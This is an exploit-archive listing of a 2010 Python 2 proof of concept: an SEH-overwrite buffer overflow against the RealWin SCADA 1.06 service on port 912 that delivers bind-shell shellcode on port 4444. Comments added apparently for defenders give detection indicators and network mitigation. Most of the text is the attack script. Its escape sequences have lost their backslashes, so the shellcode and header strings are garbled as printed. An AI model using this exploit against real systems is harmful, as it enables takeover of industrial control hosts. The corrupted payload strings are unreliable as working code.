[remote exploits] - DATAC RealWin SCADA 1.06 Buffer Overflow
Posted on 27 October 2010
================================================
DATAC RealWin SCADA 1.06 Buffer Overflow Exploit
================================================

# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)
#
# NOTE(review): this is a public 2010 proof of concept reproduced for defenders.
# The listing as extracted has lost the backslashes of its escape sequences, so
# every quoted "xNN" string below is plain ASCII text as printed, and the byte
# counts in the inline comments do not describe the strings as they appear here.
# The page does not state a fixed vendor release; treat any RealWin 1.06 host that
# exposes the service below to untrusted networks as at risk until confirmed otherwise.

import socket, sys

# Python 2 script: print statements, raw_input and str-based socket sends.
if len(sys.argv)!= 3:
    print " [*] Usage: %s <ip> <port> " % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) # port 912 by default

# windows/shell_bind_tcp - 368 bytes
# Encoder: x86/shikata_ga_nai
# LPORT=4444,
#
# Host-side indicator: the payload described by the comment above is a bind shell,
# so a successful run would leave an unexpected listening socket on TCP 4444 on
# the SCADA host. An unexplained listener on that port, or any new listener opened
# by the RealWin service process, is the thing to alert on.
shellcode =(
"xbaxe7x26x3bxa1x33xc9xb1x56xdbxcexd9x74x24xf4"
"x5dx83xc5x04x31x55x0bx03x55xecxc4xcex5dx1ax81"
"x31x9exdaxf2xb8x7bxebx20xdex08x59xf5x94x5dx51"
"x7exf8x75xe2xf2xd5x7ax43xb8x03xb4x54x0cx8cx1a"
"x96x0ex70x61xcaxf0x49xaax1fxf0x8exd7xefxa0x47"
"x93x5dx55xe3xe1x5dx54x23x6exddx2ex46xb1xa9x84"
"x49xe2x01x92x02x1ax2axfcxb2x1bxffx1ex8ex52x74"
"xd4x64x65x5cx24x84x57xa0xebxbbx57x2dxf5xfcx50"
"xcdx80xf6xa2x70x93xccxd9xaex16xd1x7ax25x80x31"
"x7axeax57xb1x70x47x13x9dx94x56xf0x95xa1xd3xf7"
"x79x20xa7xd3x5dx68x7cx7dxc7xd4xd3x82x17xb0x8c"
"x26x53x53xd9x51x3ex3cx2ex6cxc1xbcx38xe7xb2x8e"
"xe7x53x5dxa3x60x7ax9axc4x5bx3ax34x3bx63x3bx1c"
"xf8x37x6bx36x29x37xe0xc6xd6xe2xa7x96x78x5cx08"
"x47x39x0cxe0x8dxb6x73x10xaex1cx02x16x60x44x47"
"xf1x81x7ax76x5dx0fx9cx12x4dx59x36x8axafxbex8f"
"x2dxcfx94xa3xe6x47xa0xadx30x67x31xf8x13xc4x99"
"x6bxe7x06x1ex8dxf8x02x36xc4xc1xc5xccxb8x80x74"
"xd0x90x72x14x43x7fx82x53x78x28xd5x34x4ex21xb3"
"xa8xe9x9bxa1x30x6fxe3x61xefx4cxeax68x62xe8xc8"
"x7axbaxf1x54x2ex12xa4x02x98xd4x1exe5x72x8fxcd"
"xafx12x56x3ex70x64x57x6bx06x88xe6xc2x5fxb7xc7"
"x82x57xc0x35x33x97x1bxfex43xd2x01x57xccxbbxd0"
"xe5x91x3bx0fx29xacxbfxa5xd2x4bxdfxccxd7x10x67"
"x3dxaax09x02x41x19x29x07")

# Fixed 12-byte message header that precedes the overflow data. For network
# detection this constant prefix, followed by a message far larger than a
# legitimate client would send, is the most stable signature in this listing
# (the filler bytes and the SEH address are trivially variable).
head = "x64x12x54x6Ax20x00x00x00xF4x1Fx00x00"
junk = "x41" * 228
next_seh = "xebx06x90x90" # overwrites next seh
seh = "xeaxe3x02x40" # seh overwritten at 232 bytes - 4002e3ea
nops = "x90" * 20 # nop sled
junk2 = "x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode
# Mitigation: the service on port 912 should not be reachable from anything but
# the engineering stations that need it; segment the SCADA network and filter
# the port at the boundary so an unauthenticated single-packet send like the
# one below cannot arrive from an untrusted host.

print " ===================================="
print "DATAC RealWin 1.06 Buffer Overflow"
print "Written by Blake"
print "Discovered by Luigi Auriemma"
print "Tested on Windows XP SP3"
print "==================================== "
print "[*] Connecting to %s on port %d" % (host,port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,port))
except:
    # Bare except: any failure (refused, timeout, even KeyboardInterrupt) is
    # reported as a connection error and the script exits.
    print "[x] Error establishing connection "
    sys.exit(0)

# Whole payload goes out in one send on a fresh connection with no prior
# handshake or authentication; if the escapes are read as bytes this is
# 12 + 228 + 4 + 4 + 20 + 7972 + 1 = 8241 bytes. A single oversized first
# message on this port is the network-side indicator for this PoC.
print "[*] Sending payload"
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + " ")
s.close()
print "[*] Payload sent"
raw_input("[*] Press any key to exit... ")
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-27]